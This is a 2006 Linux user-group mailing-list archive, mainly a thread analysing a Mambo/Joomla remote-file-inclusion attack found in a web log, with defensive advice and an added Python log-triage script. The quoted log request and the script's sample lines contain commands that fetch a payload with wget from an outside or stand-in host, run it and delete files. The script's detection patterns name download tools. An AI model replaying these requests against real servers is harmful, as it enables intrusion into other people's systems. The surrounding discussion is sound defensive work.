Re: [SLUG] Contracting stuff: wrap it into a company or PAYE through agency?

2006-09-27 Thread david
On Wed, 2006-09-27 at 14:54 +1000, Howard Lowndes wrote:
 
 Gavin Carr wrote:
  On Wed, Sep 27, 2006 at 12:28:16PM +1000, Jacinta Richardson wrote:
  Rev Simon Rumble wrote:
  That sounds doable.  What accounting package, if you don't mind?
  We use gnucash, but SQL Ledger ( http://www.sql-ledger.org/ ) has been 
  getting
  press.  We were toying with the idea of moving over, but we haven't yet.
  
  I'm a SQL Ledger user too, but there's been an interesting fork in the
  project in the last month to six weeks, due to the perceived lack of
  openness and responsiveness of SQL Ledger's author. So you might want 
  to check out http://www.ledgersmb.org/ as well if you're considering
  moving.
 
 This is both an interesting and concerning twist that I was not aware 
 of.  Do you have any further info other than the link?
 

There was a lot of gnashing of teeth about a perceived security hole in
SQL-Ledger. Two guys posted notice of the hole but the author did not
appear to do anything about it, so a couple of weeks ago they decided to
write their own fix and fork.

The author of SQL-Ledger basically writes the entire package on his own
under GPL and sells support and documentation to make money.

He is very active developing SQL-Ledger, but I have to say that he has
very poor human communication skills. It will be very interesting to see
if the fork has legs. So far I'm sticking to the SQL-Ledger version, but
there is some very interesting chatter on the ledgersmb mailing list, so
it will be a space worth watching. 

I guess it's a classic GPL fork situation. 

 
  
  Cheers,
  Gavin
  
 
 -- 
 Howard.
 LANNet Computing Associates - Your Linux people http://lannetlinux.com
 When you want a computer system that works, just choose Linux;
 When you want a computer system that works, just, choose Microsoft.
 --
 Flatter government, not fatter government; abolish the Australian states.
 

-- 
SLUG - Sydney Linux User's Group Mailing List - http://slug.org.au/
Subscription info and FAQs: http://slug.org.au/faq/mailinglists.html


Re: [SLUG] dumb user check tool ?

2006-09-27 Thread Jamie Wilkinson
This one time, at band camp, Voytek Eymont wrote:
I have a LAMP server with several vhosts, some of the users now
install/run their own CMSs, what sort of tools/checks are there I can use
to attempt to protect the server ? (rather than, as I currently do, rely
on sheer luck)

What hosting company was that? :-)

is there anything I can do assess for various user-dumbness occurrences ??

Turn on mod_suexec and don't run mod_php.


[SLUG] d/l illicit files: wget, curl, what else ?

2006-09-27 Thread Voytek Eymont
apart from wget and curl, what else can be used to download illicit files
to a web server ?

what other stuff should I look for in the web logs ?


from web log:



GET
/index.php?_REQUEST[option]=com_content_REQUEST[Itemid]=1GLOBALS=mosConfig_absolute_path=http://www.sohbetbitanem.com/tool.gif?cmd=cd%20/tmp/;wget%20http://www.sohbetbitanem.com/mambo.txt;mambo%20mambo.txt;rm%20-rf%20mambo.*?
HTTP/1.0 200 167 - Mozilla/5.0


-- 
Voytek



Re: [SLUG] d/l illicit files: wget, curl, what else ?

2006-09-27 Thread Erik de Castro Lopo
Voytek Eymont wrote:

 apart from wget and curl, what else can be used to download illicit files
 to a web server ?

Python, Perl, Ruby, C, Haskell, Ocaml. In fact any programming language.

Also programs like lynx.

Erik
-- 
+---+
  Erik de Castro Lopo
+---+
There is no reason why anyone would want a computer in their home
Ken Olson, DEC, 1977


[SLUG] Parking at the new venue

2006-09-27 Thread Ashley

Hi All,
Is there any parking near the new venue? If so, where and at what cost?

TIA
Ashley


Re: [SLUG] d/l illicit files: wget, curl, what else ?

2006-09-27 Thread Andrew Bennetts
On Wed, Sep 27, 2006 at 08:54:04PM +1000, Voytek Eymont wrote:
 apart from wget and curl, what else can be used to download illicit files
 to a web server ?
 
 what other stuff should I look for in the web logs ?
 
 
 from web log:
 
 
 
 GET
 /index.php?_REQUEST[option]=com_content_REQUEST[Itemid]=1GLOBALS=mosConfig_absolute_path=http://www.sohbetbitanem.com/tool.gif?cmd=cd%20/tmp/;wget%20http://www.sohbetbitanem.com/mambo.txt;mambo%20mambo.txt;rm%20-rf%20mambo.*?
 HTTP/1.0 200 167 - Mozilla/5.0

This web request appears to be an attempt to exploit a vulnerability in a CMS
called Mambo.  The top hit on google for mosConfig_absolute_path is:
http://secunia.com/advisories/14337.  See also
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0512.

It's probably just an automated attempt to find and exploit hosts with the
vulnerable version of Mambo.  If you don't have a vulnerable version of Mambo
installed on your server, then you probably don't have anything to worry about.

-Andrew.
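
A log check along the lines of the reading above, as an added example that is not part of the original thread: after percent-decoding, it flags requests whose query string passes a remote URL as a parameter value, or names a download tool together with a URL, and it ignores the User-Agent field. The log lines, addresses, the host attacker.example and the signal names are constructed for this example.

```python
import re
from collections import namedtuple
from urllib.parse import unquote_plus

# Apache "combined" log format; only the fields used below are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<agent>[^"]*)"'
)

# Signal 1: a query parameter whose value is a remote URL, the shape of the
# mosConfig_absolute_path request quoted in the thread.
REMOTE_URL_RE = re.compile(r'=\s*(?:https?|ftp)://', re.I)

# Signal 2: a download tool named together with a URL inside the query string.
# The tool names are the ones mentioned in the thread.
FETCH_TOOL_RE = re.compile(
    r'\b(?:wget|curl|lynx|links)\b[^;|&]*?(?:https?|ftp)://', re.I)

Finding = namedtuple("Finding", "ip status path signals agent")


def classify(query):
    """Return the signal names matching a raw (still encoded) query string."""
    decoded = unquote_plus(query)  # %20 and + become spaces, %3A becomes ':'
    signals = []
    if REMOTE_URL_RE.search(decoded):
        signals.append("remote_url_param")
    if FETCH_TOOL_RE.search(decoded):
        signals.append("fetch_tool_with_url")
    return tuple(signals)


def triage(lines):
    """Parse access-log lines and return a Finding for each flagged request."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skipped, not flagged
        path, _, query = m.group("target").partition("?")
        signals = classify(query)
        if signals:
            findings.append(Finding(m.group("ip"), int(m.group("status")),
                                    path, signals, m.group("agent")))
    # 2xx first: the targeted script exists and answered, so that site is
    # checked before requests that hit a 404. A 2xx is not proof of compromise.
    return sorted(findings, key=lambda f: not 200 <= f.status < 300)


# Constructed sample lines (documentation addresses, placeholder host).
SAMPLE_LOG = [
    '192.0.2.10 - - [27/Sep/2006:20:40:01 +1000] '
    '"GET /index.php?option=com_content&Itemid=1 HTTP/1.1" '
    '200 5120 "-" "Mozilla/5.0"',
    '203.0.113.44 - - [27/Sep/2006:20:40:30 +1000] '
    '"GET /cms/index.php?mosConfig_absolute_path='
    'http%3A%2F%2Fattacker.example%2Fa.txt%3F HTTP/1.1" '
    '404 208 "-" "libwww-perl/5.805"',
    '192.0.2.10 - - [27/Sep/2006:20:40:55 +1000] '
    '"GET /search.php?q=wget+manual HTTP/1.1" 200 911 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [27/Sep/2006:20:41:10 +1000] '
    '"GET /index.php?option=com_content&mosConfig_absolute_path='
    'http://attacker.example/tool.gif?cmd=cd%20/tmp/;'
    'wget%20http://attacker.example/a.txt HTTP/1.0" '
    '200 167 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(f.status, f.ip, f.path, ",".join(f.signals), f.agent)
```

Legitimate redirect or proxy parameters also carry URLs, so a remote_url_param hit is a prompt to look at that vhost rather than a verdict.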



Re: [SLUG] d/l illicit files: wget, curl, what else ?

2006-09-27 Thread Voytek Eymont

On Wed, September 27, 2006 9:15 pm, Erik de Castro Lopo wrote:

 apart from wget and curl, what else can be used to download illicit
 files to a web server ?

 Python, Perl, Ruby, C, Haskell, Ocaml. In fact any programming language.
 Also programs like lynx.

Eric,

I guess I meant 'single-purpose utilities that can be easily exploited like
so' :

'some_app file_url'

through a web server vulnerability to easily deposit exploits

I'm guessing that if I do NOT have wget/curl/lynx/links available, next
time  a cms has such an exploitable hole, I'll reduce my exposure, no ??

if I remove or rename wget/curl/lynx/links from my server, apart from
occasional inconvenience to me, that won't cause me issues ?



-- 
Voytek



Re: [SLUG] d/l illicit files: wget, curl, what else ?

2006-09-27 Thread Voytek Eymont

On Thu, September 28, 2006 12:18 am, Andrew Bennetts wrote:

 This web request appears to be an attempt to exploit a vulnerability in a
 CMS
 called Mambo.  The top hit on google for mosConfig_absolute_path is:
 http://secunia.com/advisories/14337.  See also
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0512.


 It's probably just an automated attempt to find and exploit hosts with
 the vulnerable version of Mambo.  If you don't have a vulnerable version
 of Mambo installed on your server, then you probably don't have anything
 to worry about.

thanks, Andrew

unfortunately, it seems my user does have vulnerable version of Joomla...
clearly he is not following Mambo/Joomla advisories...

I know little of Mambo/Joomla, any idea how can I find out level of
installed version ?


-- 
Voytek



Re: [SLUG] d/l illicit files: wget, curl, what else ?

2006-09-27 Thread Erik de Castro Lopo
On Thu, 28 Sep 2006 08:33:47 +1000 (EST)
Voytek Eymont [EMAIL PROTECTED] wrote:

 Eric,

Who's this Eric guy? :-)

 I guess I meant 'single-purpose utilities that can be easily exploited like
 so' :
 
 'some_app file_url'
 
 through a web server vulnerability to easily deposit exploits

In Perl, Python and Ruby writing a simple app that does what wget does
is no more than 10 lines of really trivial code.

 I'm guessing that if I do NOT have wget/curl/lynx/links available, next
 time  a cms has such an exploitable hole, I'll reduce my exposure, no ??

No. it won't. You need to run this in a chroot jail or a User Mode Linux
or something like that.

 if I remove or rename wget/curl/lynx/links from my server, apart from
 occasional inconvenience to me, that won't cause me issues ?

It goes such a small way to solving the problem that it's probably
not worth it.

You would be better off making sure your machine is running a current
version of your chosen distro (what are you running btw?) and then
exploring chroot/UML/Xen/whatever solutions.

Erik


+---+
  Erik de Castro Lopo
+---+
Microsoft is finally bringing all of its Windows operating system families
under one roof. It will combine all of the features of CE, stability and
support of ME and the speed of NT.
It will be called Windows CEMENT...


Re: [SLUG] d/l illicit files: wget, curl, what else ?

2006-09-27 Thread Zhasper
On 9/28/06, Voytek Eymont [EMAIL PROTECTED] wrote:
 On Wed, September 27, 2006 9:15 pm, Erik de Castro Lopo wrote:
  apart from wget and curl, what else can be used to download illicit files
  to a web server ?
  Python, Perl, Ruby, C, Haskell, Ocaml. In fact any programming language.
  Also programs like lynx.

 Eric,

 I guess I meant 'single-purpose utilities that can be easily exploited like
 so' :

 'some_app file_url'

 through a web server vulnerability to easily deposit exploits

 I'm guessing that if I do NOT have wget/curl/lynx/links available, next
 time a cms has such an exploitable hole, I'll reduce my exposure, no ??

I would think that depended entirely on the exploitable hole; even if you get rid of those utilities, there will be ways within perl/php/language-of-choice to download things; if the exploitable hole makes those available, you're no better off for having removed those utilities.

 if I remove or rename wget/curl/lynx/links from my server, apart from
 occasional inconvenience to me, that won't cause me issues ?

I think it would cause more inconvenience than you realise. I'm not sure what Apt or up2date use, but I know that utilities such as CPAN will try to use wget/curl/links/lynx in order to download updates; you'll probably find that a lot of other systems that have the ability to look for updates do as well.

Essentially, I think you're making the same mistake here that Bruce Schneier writes about airline security people making all the time: you're reacting specifically to one attack vector that you've seen in the past, which means that that vector won't be successful again. You're not doing anything to prevent different vectors from being detected or prevented though.

I'd suggest that a more effective strategy might be to talk to your users; tell them what you've found, why it's unacceptable, and what action you'll be taking if you discover anything similar in future. Also make it clear to them how they can check things with you before they install, and be proactive in helping them find solutions that don't compromise your security - for instance, sticking phpmyadmin behind a .htaccess file.

 --
 Voytek

--
There is nothing more worthy of contempt than a man who quotes himself - Zhasper, 2004

[SLUG] October 3rd meeting of the Sydney PostgreSQL Users Group

2006-09-27 Thread Gavin Sherry
The Sydney PostgreSQL Users Group will meet on the 3rd of October 2006 at
Fujitsu Australia in North Sydney at 6:30pm.

Charles Duffy will be giving a comprehensive overview of point in time
recovery (PITR) which provides a mechanism for disaster recovery and high
availability. Importantly, he will be introducing functionality in
PostgreSQL 8.2 which greatly increases the usefulness of PITR.

Meet Gavin Sherry and Charles Duffy at the foyer of 15 Blue St North
Sydney at 6:30pm. The meeting will be held in a meeting room on level 19
but security restrictions mean that you cannot go straight up there. As
such, please try and arrive promptly. If you have any issues, contact
Gavin on 0418487420.

You can see a map of approximately where the building is here
http://www.zoomin.com.au/australia/nsw/sydney/north+sydney/blue+street/

You can see this message here:
http://pugs.postgresql.org/sydpug/archives/72.html



Thanks,

Gavin


Re: [SLUG] d/l illicit files: wget, curl, what else ?

2006-09-27 Thread Erik de Castro Lopo
Voytek Eymont wrote:

 thanks, Andrew
 
 unfortunately, it seems my user does have vulnerable version of Joomla...
 clearly he is not following Mambo/Joomla advisories...

If you allow your users to install their own versions of X, then
your distribution's patching mechanism is bypassed and you have
no way of easily keeping up to date with patches.

One way of dealing with this is to make each user run in a 
chroot/UML/Xen/whatever instance so that when their environment
is compromised it only affects them and not everyone else on
the machine.

Erik
-- 
+---+
  Erik de Castro Lopo
+---+
Hundreds of thousands of people couldn't care less about Kylix
and what it runs on.  It's there for the dying breed of die-hard
Pascal fanatics who missed their 20 year window to migrate to C
and C++.  -- Kaz Kylheku in comp.os.linux.development.apps


Re: [SLUG] Debian mirrors disappearing and reporting spam on list archive?

2006-09-27 Thread Sonia Hamilton
* On Tue, Sep 26, 2006 at 05:10:05PM +1000, Penedo wrote:
 1. Apparently the Debian mirrors are disappearing - first on Optus and
 last night apparently also on iiNet.  Does anyone know what's going
 on? (I'd ask this on debian-au but according to its archive this list
 seems to be dead since March).

Presuming that decisions at ISPs aren't totally random (I know, a very
strong assumption) Debian mirrors are being removed because volume of
traffic vs space can't be justified. Perhaps Ubuntu usage is really
encroaching on Debian?

--
Sonia Hamilton. GPG key A8B77238.
.
One OS to rule them all, One OS to find them.
One OS to call them all, And in salvation bind them.
In the bright land of Linux, Where the hackers play. 


Re: [SLUG] Debian mirrors disappearing and reporting spam on list archive?

2006-09-27 Thread Jeff Waugh
<quote who="Sonia Hamilton">

 * On Tue, Sep 26, 2006 at 05:10:05PM +1000, Penedo wrote:
  1. Apparently the Debian mirrors are disappearing - first on Optus and
  last night apparently also on iiNet.  Does anyone know what's going on?
  (I'd ask this on debian-au but according to its archive this list seems
  to be dead since March).
 
 Presuming that decisions at ISPs aren't totally random (I know, a very
 strong assumption) Debian mirrors are being removed because volume of
 traffic vs space can't be justified. Perhaps Ubuntu usage is really
 encroaching on Debian?

More likely: A server that has (for whatever reason) managed to delete their
debian mirror will impact downstream mirrors if/when they rsync --delete.

- Jeff

-- 
linux.conf.au 2007: Sydney, Australia   http://lca2007.linux.org.au/
 
   IMO we should end the thread based on that; configurability is always
   the best choice when it's pretty simple to implement. - Havoc
  Pennington, 1998


[SLUG] UC Berkeley offers free courses and symposia through Google Video

2006-09-27 Thread Adam Bogacki
 I know how my Berkeley education shaped how I view the world, and now
 more people will be able to have the Berkeley experience. Move over
 Fox News - now people can watch Physics for Future Presidents on
 Google Video, Healy said.
Ahh, broadband ...

Fyi,

Adam Bogacki.

http://www.berkeley.edu/news/media/releases/2006/09/26_google.shtml


Re: [SLUG] d/l illicit files: wget, curl, what else ?

2006-09-27 Thread Matthew Hannigan
On Thu, Sep 28, 2006 at 08:40:38AM +1000, Erik de Castro Lopo wrote:
 [ .. ]
  if I remove or rename wget/curl/lynx/links from my server, apart from
  occasional inconvenience to me, that won't cause me issues ?
 
 It goes such a small way to solving the problem that it's probably
 not worth it.
 
 You would be better off making sure your machine is running a current
 version of your chosen distro (what are you running btw?) and then
 exploring chroot/UML/Xen/whatever solutions.

I wonder if the best bang for buck is perhaps just have a iptables
rule to prevent outgoing connections for the user running apache.

Or will this potentially kill those new fancy schmancy ajax/web2 apps.


Matt



Re: [SLUG] Debian mirrors disappearing and reporting spam on list archive?

2006-09-27 Thread Penedo
On 28/09/06, Jeff Waugh [EMAIL PROTECTED] wrote:
 More likely: A server that has (for whatever reason) managed to delete their
 debian mirror will impact downstream mirrors if/when they rsync --delete.

Which is apparently what happened - the main server off of which everyone in Australia is mirroring lost a disk. The mirrors are pretty much back in place as of this morning.

Also to the dude who said he uses the NZ mirrors - check your tcptraceroute - from iiNet to NZ I get a route through the US.

Cheers,
--P

Re: [SLUG] d/l illicit files: wget, curl, what else ?

2006-09-27 Thread Zhasper
On 9/28/06, Matthew Hannigan [EMAIL PROTECTED] wrote:
 I wonder if the best bang for buck is perhaps just have a iptables
 rule to prevent outgoing connections for the user running apache.

 Or will this potentially kill those new fancy schmancy ajax/web2 apps.

It won't kill anything ajaxified, as those things still rely on the browser opening connections to the server.

--
There is nothing more worthy of contempt than a man who quotes himself - Zhasper, 2004

Re: [SLUG] d/l illicit files: wget, curl, what else ?

2006-09-27 Thread Voytek Eymont

On Thu, September 28, 2006 8:42 am, Zhasper wrote:
 On 9/28/06, Voytek Eymont [EMAIL PROTECTED] wrote:

 Essentially, I think you're making the same mistake here that Bruce
 Schneier
 writes about airline security people making all the time: you're reacting
 specifically to one attack vector that you've seen in the past, which
 means that that vector won't be successful again. You're not doing
 anything to prevent different vectors from being detected or prevented
 though.

yes, I realize that, though, i feel it's still better to 'do something'


 I'd suggest that a more effective strategy might be to talk to your
 users; tell them what you've found, why it's unacceptable, and what action
 you'll be taking if you discover anything similar in future. Also make it
 clear to them how they can check things with you before they install, and
 be proactive in helping them find solutions that don't compromise your
 security - for instance, sticking phpmyadmin behind a .htaccess file.

yes, of course, though, it's clear this user's apparent skills don't
extend to security consideration...



-- 
Voytek



Re: [SLUG] d/l illicit files: wget, curl, what else ?

2006-09-27 Thread Jamie Wilkinson
This one time, at band camp, Voytek Eymont wrote:

On Wed, September 27, 2006 9:15 pm, Erik de Castro Lopo wrote:

 apart from wget and curl, what else can be used to download illicit
 files to a web server ?

 Python, Perl, Ruby, C, Haskell, Ocaml. In fact any programming language.
 Also programs like lynx.

Eric,

I guess I meant 'single-purpose utilities that can be easily exploited like
so' :

'some_app file_url'

through a web server vulnerability to easily deposit exploits

I'm guessing that if I do NOT have wget/curl/lynx/links available, next
time  a cms has such an exploitable hole, I'll reduce my exposure, no ??

perl -MLWP -e 'GET url'

or somesuch :)  You want to remove perl too?

Configuring apache to run the potentially vulnerable code in a security
domain with minimum rights is going to let you sleep better than removing
random tools.

Sure, minimise the options an attacker has, defense in depth and all that.
Start at the bottom of the network stack and start securing yourself from
there, then up through the application layer, then once you're inside the
application itself, partition execution contexts so that the stuff you don't
trust (i.e. the CMS) when hacked doesn't have the opportunity to damage your
system, then they'll pop up like sore thumbs when it does happen, and make
for easier analysis of attack vector.


Re: [SLUG] d/l illicit files: wget, curl, what else ?

2006-09-27 Thread Jamie Wilkinson
This one time, at band camp, Erik de Castro Lopo wrote:
Voytek Eymont wrote:

 thanks, Andrew
 
 unfortunately, it seems my user does have vulnerable version of Joomla...
 clearly he is not following Mambo/Joomla advisories...

If you allow your users to install their own versions of X, then
your distribution's patching mechanism is bypassed and you have
no way of easily keeping up to date with patches.

One way of dealing with this is to make each user run in a 
chroot/UML/Xen/whatever instance so that when their environment
is compromised it only affects them and not everyone else on
the machine.

chroot/UML/Xen is not the hammer for this screw :)  Anchor has survived for
6 years without a root compromise, allowing customers to install their own
buggy unpatched versions of code, and all running on an unvirtualised
machine.

You can add yourself the overhead of Xen for a shared hosting environment,
but it's not necessary when you take the time to use a simple privilege
separation technique, e.g. mod_suexec.
-- 
SLUG - Sydney Linux User's Group Mailing List - http://slug.org.au/
Subscription info and FAQs: http://slug.org.au/faq/mailinglists.html


Re: [SLUG] d/l illicit files: wget, curl, what else ?

2006-09-27 Thread Martin Pool
On 28 Sep 2006, Jamie Wilkinson [EMAIL PROTECTED] wrote:
 This one time, at band camp, Voytek Eymont wrote:
 
 On Wed, September 27, 2006 9:15 pm, Erik de Castro Lopo wrote:
 
  apart from wget and curl, what else can be used to download illicit
  files to a web server ?
 
  Python, Perl, Ruby, C, Haskell, Ocaml. In fact any programming language.
  Also programs like lynx.
 
 Eric,
 
 I guess I meant 'single-purpose utilities that can be easily exploited like
 so' :
 
 'some_app file_url'
 
 through a web server vulnerability to easily deposit exploits
 
 I'm guessing that if I do NOT have wget/curl/lynx/links available, next
 time  a cms has such an exploitable hole, I'll reduce my exposure, no ??

Voytek,

Perhaps it's just me but I don't understand *where* and *by whom* you
are trying to prevent them being executed.

You can't (obviously) control what is run by random people on the
internet who are attacking your machine.  You can try to filter by the
User-Agent string to block requests from those programs, but that is
trivial to spoof, and regularly spoofed by attack tools.  See e.g.
http://www.metasploit.com/

If an attacker has control of your machine you have more serious
problems than whether they can run wget or not.

Similarly if your users are running vulnerable software you should just
fix that rather than worrying about wget...

 perl -MLWP -e 'GET url'
 
 or somesuch :)  You want to remove perl too?

And in php something like open('http://ubuntu.com/') may work too, 
depending on the configuration.

-- 
Martin


[SLUG] Spamassassin

2006-09-27 Thread John
Hi list,

My e-mail isn't getting through to the mail box.

Syslog keeps showing bayes: expire_old_tokens: child processing timeout.

After Googling I've found a comment that suggests a manual Bayes expire run but doesn't go on to describe how to do it.

Has anyone struck this before and how do I sort it, please?

TIA
John

Re: [SLUG] Spamassassin

2006-09-27 Thread James Gray


On 28/09/2006, at 12:27 PM, John wrote:


 Hi list,

 My e-mail isn't getting through to the mail box.

 Syslog keeps showing bayes: expire_old_tokens: child processing timeout.

 After Googling I've found a comment that suggests a manual Bayes
 expire run but doesn't go on to describe how to do it.

 Has anyone struck this before and how do I sort it, please?

 TIA

 John


Hi John,

While spamassassin is expiring old records from the bayesian database, it
can't be used for filtering.  Basically spamd/spamc will have to wait until
the expire is finished before they can process any pending messages - hence
the timeouts.


To do manual expire run:

sa-learn --force-expire --sync

When that's done, you should see something like this:
expired old bayes database entries in 14 seconds
160491 entries kept, 165910 deleted
token frequency: 1-occurrence tokens: 58.52%
token frequency: less than 8 occurrences: 24.85%

You may need to wrap up the sa-learn in su so that your expire run uses the
same user as the normal spamassassin process.  Running as root might leave
some files with root-only permissions which will break normal scanning etc.
(seen this on FreeBSD) plus if you're doing per-user spamassassin bayes
corpus, running as root won't pick up the user-specific bayes data.


Cheers,

James




Re: [SLUG] d/l illicit files: wget, curl, what else ?

2006-09-27 Thread Matthew Hannigan
On Thu, Sep 28, 2006 at 11:45:17AM +1000, Jamie Wilkinson wrote:
 You can add yourself the overhead of Xen for a shared hosting environment,
 but it's not necessary when you take the time to use a simple privilege
 separation technique, e.g. mod_suexec.

Speaking of mods, http://www.modsecurity.org/ might well
prevent a lot of  badness.  I don't know whether the administration
involved in a complex isp hosting situation would be worth it though.

(me googles)
in http://www.cerias.purdue.edu/weblogs/coj/secure-it-practices/post-37/
Ed Finkler says:

mod_security is an essential tool
for securing any apache-based hosting
environment

So who am I to argue :-)

FWIW, there's also a post on this Mambo/Joomla worm:
http://www.cerias.purdue.edu/weblogs/coj/infosec-education/post-11/


Matt


Re: [SLUG] Parking at the new venue

2006-09-27 Thread Martin Pool
On 27 Sep 2006, Ashley [EMAIL PROTECTED] wrote:
 Hi All,
 Is there any parking near the new venue? If so, where and at what cost?

There's some multi-story carparks provided by the City of Willoughby off
Willoughby Road; I think this will be free at that time.  That's about
600m from IBM.  Otherwise there is a lot of on-street parking, but much
of it will be metered on Friday night.

-- 
Martin


Re: [SLUG] Parking at the new venue

2006-09-27 Thread John Ferlito
On Thu, Sep 28, 2006 at 01:49:43PM +1000, Martin Pool wrote:
 On 27 Sep 2006, Ashley [EMAIL PROTECTED] wrote:
  Hi All,
  Is there any parking near the new venue? If so, where and at what cost?
 
 There's some multi-story carparks provided by the City of Willoughby off
 Willoughby Road; I think this will be free at that time.  That's about
 600m from IBM.  Otherwise there is a lot of on-street parking, but much
 of it will be metered on Friday night.

   Last month there was loads of street parking in Chandos St which is
nice and close. From memory it wasn't metered after 6pm. Well at least
I didn't put any money in the meter anyway.

--
John
http://www.inodes.org/


[SLUG] Re: September SLUG Monthly Meeting

2006-09-27 Thread Andrew Cowie
On Tue, 2006-09-19 at 10:10 +1000, Lindsay Holmwood wrote:
 General Talk: Conrad Parker ... It will be
 Conrad's last SLUG meeting for at least 3 years as he's leaving to
 study in Japan a few days after the meeting. Sayonara!

So be sure to wear something plaid tomorrow night...
http://research.operationaldynamics.com/blogs/andrew/#slug-plaid-for-kfish

:)

AfC
Sydney

-- 
Andrew Frederick Cowie

Technology strategy, managing change, establishing procedures,
and executing successful upgrades to mission critical business
infrastructure.

http://www.operationaldynamics.com/

Sydney   New York   Toronto   London



Re: [SLUG] Parking at the new venue

2006-09-27 Thread Michael Fox

On 9/28/06, John Ferlito [EMAIL PROTECTED] wrote:


   Last month there was loads of street parking in Chandos St which is
nice and close. From memory it wasn't metered after 6pm. Well at least
I didn't put any money in the meter anyway.


Good to know, still hope to someday visit.